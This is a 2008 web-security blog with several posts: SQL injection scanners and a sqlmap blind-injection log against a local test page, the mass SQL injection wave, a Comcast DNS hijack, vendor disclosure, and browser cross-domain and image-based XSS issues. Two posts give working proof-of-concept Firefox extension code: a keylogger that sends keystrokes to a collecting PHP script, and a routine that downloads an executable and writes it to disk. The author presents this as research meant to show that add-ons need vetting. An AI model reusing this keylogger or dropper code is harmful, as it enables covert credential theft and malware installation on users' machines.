Would a WAF solve that?

Tuesday, June 24, 2008

HP and MS give us a new SQL Injection tool

| Armando Romeo |

Just downloaded it and trying it while I write.
After the recent Mass SQL injection attacks Microsoft decided to call HP (who owns SPI labs) to create a tool to detect potential SQL injections in a site

The tool name is Scrawlr and is downloadable from HP here.

It first acts as a crawler (Sql injection Crawler).
Then makes a list of dynamic pages and finally tries to inject sql injection payload to proof the existence of the vulnerability



I must say it is nothing impressive. It is limited in the number of links crawled (it picked up just a little fraction of the actual link in my local Joomla installation).


I even created a simple page with a basic blind SQLi vulnerability but it didn't recognize the injection.
It's just a matter of comparing two outputs based on two different attack payloads. But nothing. It seems the tools only looks for known SQL errors in the returned page and no blind sql injection detection.

Further tests should be done but it's 2 am in Italy, so I hope to read your comments about the tools when I wake up...

Monday, June 23, 2008

Penetration testing as an art

| Armando Romeo |

I found Chris Eng post about the correct definition of Penetration testing quite interesting. Whether you consider it an art or a science is not just a play on words or a way to make you feel Einstein or Michelangelo.

It's a way to have it carried out in the correct way.

Into Penetration testing, the approach ( modus operandi ) is most of the time much more important than the tools or checklists you use.



While someone thinks, aided by the so many checklist-type security being trendy recently, that penetration testing is a science, there's a lot of other experts who look at it as an art.

I believe both are wrong. Security is known to be one of the most difficult problems an engineer has to solve. Above all you stand from the good-guys side.

Only people in this room will understand what I am now going to say. It is this: Security is perhaps the most difficult intellectual profession on the planet


This is what Dan Geer's said in a keynote at SOURCE Boston.

Actually it's this difficulty that makes someone think that security and specifically penetration testing is an art and not a science.

It's not, IMHO, that a problem has too many variables and factors to take into consideration in order to be solved that it takes some talented mind to actually do it. It's all a matter of skills in this case.

If you could master all the possible aspects, details, behaviours and even the most hidden tricks of the system you're pentesting probably it would merely be a science since it would engage your experience/skills and not your talent as a genius mind.

It would just require your past knowledge and not your intuition.

There's a sharp distinction between the intellect and the experience.

The problem is that you can never know all the details, behaviours and features of your target because every target has its level of uniqueness.

And this is where the innate ability of intuition comes in handy, or better comes in *necessary* to master the most difficult intellectual profession on the planet.

It's just here that the science leaves the scene to the art.

A talented penetration tester wouldn't only mark the check lists but would find new unlinested methods to achieve his goal of breakinf/securing the system he's on.

Logic flaws comes to my mind here. But how could I forget about social engineering. In the end, Mitnick is probably the most renowned hacker ever just because of his innate talent. I don't remember of him being celebrated for elite attacks learned into some ethical hacker certification course.
(That you have to master anyway if you want to enter the field).

Both social engineers and all those flaws related to logic cannot be solved through a scientific approach to the problem. No tools baby and no checklist.

That's why I believe that, yes, penetration testing, must have an agreed
and standardized scientific approach, based on checklist, best practices etc.
But for each checks in that list, for each of those steps in the scientific/deterministic process of penetration testing there must be space for further investigation left for talent.

And Talent is not something you achieve with CISSP. You're right dre.
Day by day hands-on practice is the only training for your talent.

If I needed a penetration tester I would ask him how many years of experience he had in the trenches rather than how many certs.
And possibly if he had a past as a hacker.
Real hackers have some talent, and hands on practice by definition.

I don't believe into born-white-hat security professionals.
No matter how CISSP they are are.
Do you?

Thursday, June 19, 2008

Have you been hit by Mass SQL Injection?

| Armando Romeo |

Mass Sql injection has been the most important threat being experienced by the
security (and web masters) community from April 2008 until now.

Over 510.000 servers have been successfully exploited using the same payload and a few variants of the same exploit.

At first the attack was believed to be a malware able to propagate on vulnerable servers through SQL commands.


A further forensic study demonstrated how the attack is instead generated by thousands of bots crawling the net for vulnerable web applications. Asprox botnet (15.000 infected hosts as of March 08) above all.

The potential targets are recognized through google dorks and the attack starts injecting a payload able to replace all the string-type field of the database with a javascript payload being downloaded from certain domain names.

The javascript would have been finally executed on the vulnerable websites visitors in order to attempt a forced download of an online gaming trojan horse as well as adwares. Or just more Asprox listeners...

Targeted web applications seemed to be only ASP web pages using Microsoft SQL Server, but more variants of this kind of attack are being discovered targeting different languages and different servers platforms.

The exploitation is made possible due to poorly written web applications while
no vulnerabilities exist into IIS/SQL server for sake of clarity.

A tool is available to check wether your webserver has been hit by Danmec/Asprox botnet: SQLInjectionFinder.

It basically scans your IIS logs looking for known exploit payload like "CAST(" statements. This tool is much better than running an automated scanning tool against your web site scripts although secure scripts or a WAF "in front" of them would have surely mitigated the attack impact.

Time to acquire some WAF vendors' stocks now.

Monday, June 16, 2008

Optimized Blind Sql Injection

| Armando Romeo |
Blind sql injection is a technique that let hackers retrieve database data through a sql injection that doesn't give out useful information through web application errors.

Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when user inputs characters meant to
trigger an sql error.


So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false base. They provide the web app with input known to be faulty to trigger a FALSE case and input known to be working to trigger a TRUE case.

Using a TRUE/FALSE condition a loop through the charset is undertaken to recover a string in the database one character at a time. Usually the SUBSTRING/CONCAT sql commands are used to match a correct guess with the TRUE case.

The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind sql injection are not optimized.
Recently I came across with a nice research from Secforce.

They have written a quick tool to optimize the task of dumping a database through a blind sql injection.

The tool, written in python is basically a shell.
You provide parameters like vulnerable web page and then it will retrieve the desired portion of database (table names, column names or full data), nothing different from all the other sql injection tools.

What makes this tool better than the others (for blind sqli) is its speed thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I personally undergone I noticed that sqlmap is the tool that is best (together with secforce blind sql injection tool) at dumping data through blind sql injection.

Here's the dump from the console of an injection process using sqlmap:


C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"

sqlmap/0.6-rc5 coded by inquis
and belch

[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue

[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue

[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'

[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brand
id'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND No
Value
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DMBS is not MySQL

As you can see from the above, sqlmap starts trying to understand if the first character of our banner
has an ascii value greater of 63 (that is 127/2). Not in our case.

[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DMBS is not Oracle
[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DMBS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server

The process above is discussed in the paper released by secforce.
Sqlmap has retrieved the database banner/version in approx. 60 seconds.

Blind SQL Injection shell has done in 80 seconds due to the fact that it retrieves all the chars one by one thus being able to retrieve any kind of banner with 100% precision while sqlmap requires the matching of few chars to match it with default banners.

A video to show the basic functions of the tools is available from secforce tool page. Only con: it doesn't support the use of a proxy as of now. (It's open source so anyone can add this feature easily)

Saturday, May 31, 2008

Comcast: A chain is only as strong...

| Armando Romeo |

What happened to Comcast few days ago made me think a lot.
They have been hijacked through dns, their site defaced
and they still don't know if the hackers have played something more elite before leaving the ugly message on the second biggest US ISP home page.

There's a really interesting blog post about the interview released by one of the two hackers known as Defiant and EBK.

I slept in my clothes, because the last time they came, I was in my underwear with my dong hanging out and shit

Their identity has been almost immediately discovered and they will probably have not a good summer.

Beside that, what is most interesting into this hack is that the vulnerability is not to blame to Comcast but to the Comcast's domain management console at Network Solutions.



So a completely different server under a completely different administrative domain.

This kind of hack is not new.
Domain hijacking is no more a last resort for hackers.
Above all for secured websites. It happened to hackerscenter and zone-h. (Yes sigh, audit your hosting panels before you hit Order button)

Domain registrar panels have vulnerabilities.
Hosting company's billing panels have vulnerabilities.
And these can be mount point for attacks to Hijacking DNS or gaining full access to the website server.

But, when I read about this story, I started wondering.
What happened if, instead of Comcast, they hacked a big merchant/retailer website?
Easily enough they could have collected some hundreds (if not more) of credit cards in few hours.
Comcast hijacking lasted only few hours (2 says Comcast), just because they called domain technical contact on the phone warning him about the ownage.

Next question is: considering the happenings above, is PCI certification still valuable for customers to measure a merchant safety level?
Probably not or not completely, and PCI is not to blame for this.

PCI compliance is pushing merchant websites security upwards, but there's no
way, no WAF or code review that can secure a website from attacks held through other administrative domains.

A chain is only as strong as its weakest link.
And the weakest link is not in our hands.
That's what we can learn from Comcast story.

Wednesday, May 28, 2008

Security - Am I phobic?

| Armando Romeo |
Am I being pedantic in reporting a CSRF vulnerability?
I have had the (bad?) luck of being in the position of reporting vulnerabilities to many software vendors.
Most of these were web application related. Wether I did it for fun, for commitment or for my own site security I always liked the reponsible disclosure approach.

I feel, we good guys, should help the developer community learn from their mistakes with some compassion.

But the more I work in the security field the more questions arise to my mind.
Am I being paranoic when I explain how a cross site scripting can ruin a website credibility, steal customers data and lead to malware propagation?

Well, sometimes, when you talk to software vendors and you have to show them the risks related to your findings you feel like phobic. They make you feel such, with their "so what?", "it seems hard to exploit" or "is this a vulnerability for real?".

I decided to talk about this after reading that an authority in the field posted his feelings about this as well.

I feel like only security community tend to give the right weight to each kind of vulnerabilities while the vendors base just make a reasoning about ROI, image (stock exchange) impact and risk acceptance.

Security layer is implemented only when it becomes a duty.
Being it by laws or compliance.
Security for sake of security is just a motto of some open source projects like Joomla. You wouldn't believe how interested they are into fixing and hardening this FREE CMS. Why?
Because they have the knowledge to do it on their own without outsourcing it.
Vendors have, most of the time, to outsource audits and security plans to third party companies.

Outsourced security gives better results 99% of the times since it is carried on by people doing this to live. But it is also costly and not guaranting any 100% security. No security company can afford any guarantee.

So security professionals are becoming more and more sales men.
They need to be persuasive:
if you don't secure your self, you will get hacked and lose more money than what you're giving me now to secure yourself.
Moreover, outsourced security contracts are being used to show at least "good intentions" when customers complain
about stolen credit cards. I mean, they can become an attenuate when a hacked company has to indemnify its customers
after a disaster.

That's why risk/vulnerability assessment, has its importance.
I would make it the first step in a security engagement.
And I'm more than happy to see more compliance rules forcing companies to demonstrate a minimum certified security level.

Not that these compliance (like PCI) are synonymous of security, but at least, we, security good guys, know that we are not talking to walls.
They have to listen to us, because I know we are not phobic.

Thursday, May 22, 2008

Cross Domain Thriller

| Armando Romeo |

Manuel Caballero's speech at Microsoft's BlueHat conference has gifted a nice thrilling story to talk about. Giorgio Maone and sirdarkcat are trying to descramble the enigma about this resident script vector able to allow cross-domain scripting through Iframes. Stealing cookies though has not been confirmed as far as I know.

Manuel's speech title was "A Resident in My Domain", that is how a script can be resident in all the pages browsed by a user with FF and IE (6,7). No matter what, all the domains can be ghost-infected since the ectoplasm is in the browser (that references new windows and control them) and not in the application code. Nice enough to create a lot of noise in the field.

Manuel is a penetration tester for Microsoft. He obviously didn't disclose the attacking vector but demonstrated it causing "shocking feelings" in the room as someone witnessed. I wasn't there. I'm sure noone died for heart attack though.

Now, lemme ask a question. Why hasn't Microsoft patched the browser before all this came out on the scene? The attack seems to be still working and noone is going to say more than what Microsoft wants to be known about the subject.

Quoting from Manuel's abstract:

"Imagine an invisible script that silently follows you while you surf, even after changing the URL 1000 times and you are feeling completely safe. Now imagine that the ghost is able to see everything you do, including where (location) you are surfing, what you are typing (passwords included) and even guess your next move. No downloading required, no user confirmation, no ActiveX. In other words: no strings attached. We will examine the power of a resident script and the power of a global cross domain. Also, we go through a step by step approach on how to find cross domains and a resident scripts. "


Nice, let's patch it!

Wednesday, May 14, 2008

More Firefox Addons ownage - POC

| Armando Romeo |

My research aim was to explore the capabilities of firefox extensions just to see what they can or can't do. I have found out that they are just as powerful as any other executable on your hard drive and since they are javascript running within Firefox environment they are not detected by AV's or addons like Noscript.

Reading past news headlines I have found other researchers interested into this kind of research , so I am not alone.

Once again I didn't want to use any external XPCOM library as mentioned in my previous research . Just plain javascript.

This time we are able to write any kind of file anywhere on the hard drive.

Firefox gives such privileges only to local chrome, that is the extensions you manually install on your browser. This shouldn't work with remote XUL files (hopefully).

The problem here is that people is invited to install a backdoored extension as happened to the vietnamese firefox language pack that has been backdoored with adware and installed on thousands of PC's.

What is worse in this story is not the infection in itself, very possible and easy as demonstrated by my research, but the fact that the infected extension has been given by mozilla.com trusted domain (the official mozilla addons page yes).

While discussing my research with Yash , CTO of securitybrigade.com, this came up as a mitigating factor. We do believed that Mozilla at least had a an approval process before giving an extension for download on the trusted domain. But Vietnamese hackers managed to demonstrate this is not (always) true.

So let's come to this new proof of concept.
Our aim is to retrieve a file and put it on the local hard drive.

Our file can be an executable. This wants to demonstrate the full access of firefox addons to the local filesystem.

Writing to a file is an easy task :

function savefile() {
try {

netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");

} catch (e) {
alert("Cannot write to disk");
}
var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile);
file.initWithPath( "C:\\test.exe");

file.create( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 420 );

var outputStream = Components.classes["@mozilla.org/network/file-output-stream;1"].createInstance( Components.interfaces.nsIFileOutputStream );

outputStream.init( file, 0x04 | 0x08 | 0x20, 3, 0 );

var result = outputStream.write( bytestream, bytestream.length);
outputStream.close();
}

Our bytestream variable contains the bytes of the retrieved executable.
This can be obtained simply using XmlHTTPRequest:

function getFile() {

var url="http://localhost/hackerscenter/test.exe";

http=new XMLHttpRequest();
http.onreadystatechange=handleRequest;
http.open("GET",url,true);
http.send(null);

}


getFile() function is called at startup to make a request for a remote file.
handleRequest() will be our callback function when the request has been fulfilled and a response received (asynchronous call).

When a response is received savefile() wil just write it on local disk.

The most important part of this snippet is the call to


netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");

That is we ask Mozilla to give us privileges according to the privilege scheme allowed in our context. Since this is a local XUL file, we are allowed to read/write the filesystem.

I didn't want to provide an installable package to keep script kiddies away.
I have not added the code for handling truncation of binary data when the null byte is encountered.



Conclusion

We are able to read write on disk. We are able to keylog typed chars in the Firefox window. We are able to change Firefox preferences. With the use of external loaded libraries it is even possible to spawn shells! This was just a quick survey on the capabilities of addons that brings up the need for strong validation and approval process before they get on trusted domains like the official mozilla addon website.

Wednesday, April 16, 2008

Firefox Addons own ya - Keylogger POC

| Armando Romeo |
This was a project I was meant to carry on last year when I started learning the capabilities of coding in the Gecko environment to create Firefox addons.
I was working to create an addon capable of digitally sign documents easily from the web browser interface using certificates.
For this post I prepared a proof of concept to demonstrate how powerful coding Addons can be, and how malicious code can be embedded in your Firefox without Antivirus or Firewall even notice it.


Now attention here, forget the pic above.
Not anyone is aware of this capabilities and people tend to install any kind of addon/style on Firefox from untrusted ( or unverified ) third parties.
Most of the firefox addons you find on the net is not signed and almost all of them are not validated or checked for malicious code.

My small POC consists of a keylogger written in javascript and embedded into Firefox browser in form of extension. This code can be injected into any known/famous addon without even noticing it since it creates no warnings at Antiviruses (it's just legal javascript) and no warning from Firewalls since the logs of the keystrokes are sent through Firefox on port 80 to a malicious server.



Firewalls allow Firefox on port 80 if you want to browse the internet, so no way to understand what's going on under the hood unless you track all the packets going out of your internet interface.

The POC is an installable extension that once installed it doesn't add anything to the Firefox appearance.

Get it here

It adds an event listener for the event keypress to the document object, buffers the keystrokes and then send them to a server collecting them.

Moreover no warning of an external page loading is showed in the browser status bar, the call is handled through XMLHttpRequest and not using iframes.

To test the proof of concept I created a server side php file that listen for keystrokes and save them on file. The file is log.php in the above zip

3 lines of code as simple as:

$fh=fopen("log.txt","a+");
fwrite($fh,$_GET['c']);
fclose($fh);

This must be put in localhost under folder "hackerscenter" and called log.php. So you will need a local web server in order to test it.

That is http://localhost/hackerscenter/log.php must be found by the extension.

The most important part of the keylogger is this piece of javascript code (the content of the extension):

document.addEventListener("keypress",onkey,false);
var key_str='';

function onkey(e) {

key_str+=String.fromCharCode(e.charCode);

if (key_str.length>50) {

http=new XMLHttpRequest();
http.open("GET","http://localhost/hackerscenter/log.php?c=" + key_str,true);
http.send(null);
key_str='';
}

}

On first line we add an event listener for the keypress event. Everytime a key will be pressed a call to onkey() function will be made and the object event passed.

Through the event object event we retrieve the character pressed with event.charCode.
We buffer the keystrokes until we reach 50 characters and then make a call to our logger through XMLHttpRequest().
Once the buffer is sent it gets flushed. Small, easy and powerful.


There are mainly 2 ways to embed malicious code into Firefox.
One uses the above plain javascript that anyone can read since firefox extension .xpi is just a .zip (if you rename it to .zip you can see the actual content) and the modules are just xml and javascript.
This is the way I followed for this quick POC.

The other option is to have our javascript load a C++ or Java library and have these libraries do the dirty job.

In this case reverse engineering of the library would be required, not always an easy task so this method adds more stealthiness to the code.
There are many examples on the net for loading a C++ dll from javascript in the
Gecko environment.
In the end this is how Firefox is built: styles and the appearance are rendered through xul (powerful but easy xml language for application GUI) and css and more complicated functions are left to external compiled libraries loaded and called by javascript code.

Probably this is not a completely new invention by me, but this should be the demonstration that this is easy to do and that Firefox addons are no-less than executable.

I would add that since external requests are carried through Firefox it is even better(worse) than using an executable for which any application firewall/antivirus would complain about.

Note: to test the above in a development firefox environment without using your everyday browser follow these easy steps:
1. close all firefox windows
2. from shell c:\mozilla dir\firefox.exe -p
3. create a new profile and launch it
4. install and test the POC from within this new firefox profile

To use back your previous default firefox profile, close all windows and repeat step 2 choosing to run firefox using your default profile.


My research goes on as malicious code into Firefox addons can harm web applications, defeat CSRF defenses and play with cookies.
I'm still playing with it, so you now know how I will spend my next saturday night. Enjoy...and don't forget to add your comment if you like our prizes to the best commenter

Exploiting browsers mental diseases

| Armando Romeo |
I was reading an interesting blog post on Billy Rios Blog about new Google XSS found in Google spreadsheet.
In the specific, that XSS is in my opinion to blame more to Internet Explorer, the only vulnerable browser to this XSS, than to Google itself.

The javascript injection is caused by Internet Explorer rendering text/plain as active content that is HTML.
Indeed Billy just created a link to the spreadheet in CSV format.
The spreadsheet contains a javascript snippet code as content of the first cell that is then interpreted as HTML code by guilty Internet Explorer.

The problem could have been avoided if google explicitly set the Content-disposition to "attachment" forcing browsers to give the file for download and not for inline show.

The most interesting part is not the exploit in itself but the way it is achieved.
Internet explorer as well as other browsers do not take much into consideration security while deciding how to render documents based on the content type being sent by the server.

Internet Explorer is demonstrated to render 696 over 735 content types as HTML. This means that if we are able to input data into a web application that uses one of those content types we may end up with a XSS
working under IE because will render it as active content (read HTML).

As in the Rios's exploit, web application must have Content-disposition set to inline to be vulnerable (this is the default option).

Now I will need your attention. From the (great) Leviathan Security paper scroll down the list of MIME types being NOT interpreted as active content by IE.
Do you see image/jpeg ?? Nope!
And here comes what me and Doz were discussing about some time ago in the past.

Internet explorer 7 interprets jpeg images as inline (of course) but what is worse it reads its content and outputs it as if it were HTML!

Click here for a proof of concept

This is not new, but probably not much exploited since Microsoft
suffers from this issue since version 6.
Firefox doesn't suffer from such schizophrenia.

This kind of (logical) flaw can be used into all those web application that don't use GD or any other graphical library to check for image validity.
I'm talking about those that check only the extension.

I'm talking about using your fake image as the avatar of a forum thus rendering javascript on its pages.

I'm not sure if it is possible to both show the pic and trick IE to render the html at the same time, I'm not much into jpeg or image handling to carry this research on but this could be super-dangerous as noone would investigate
the broken image icon due to the fake image with JS code into it.

In the end, I agree with Billy, web developers should understand more about browsers behaviours and use HTTP headers accordingly if they want to keep their web app secure.

Writing a good secure code is not enough to produce a secure web application if you feed browsers with psychological disorder

Thursday, April 10, 2008

I want to be a web app hacker

| Armando Romeo |

Oh well, countless times I've heard people consider themselves hackers just because they got an SQL error after giving a quote character " ' " instead of a numeric value in a web application parameter.
How they would browse the database content is still mysterious...to them.

Web application security has been my first love. I had done some nice researches on it too and spent hours and hours playing with http protocols and server side scripting. And these are the initial (annoying-not-to-me) steps that everyone interested to enter this field should take.

But this quick post, is not about how to become a hacker but how nice it can be if you just learn by practice using some nice tools freely available: BurpSuite or Webscarab to name the best learn-while-hacking tools.

Both are well known to experts in the field as they are good companions while pen-testing a web app in black-box "style".

And both are not those kind of tools that do the task in one click but they assume a basic knowledge of the protocols and the actors' roles in the scene (client and web server). So they are great while in learning-mode and great even when you get pro.

So the best (humble) advice I could give to anyone willing to enter this field is to install some open source web application and try to attack it in "black-box" mode using the above tools to intercept request and manipulate them.

Once you have found something looking like a vulnerability then browse through the code and understand where and why the vulnerability is there.

Next step would be to understand the state-of-the-art coutermeasures/mitigating factors and iterate again to find circumventions of such countermeasures.

I find this the best way to understand what's going on under the hood and also the best way to write secure code when you are on a web application coding task.

Free Security Magazines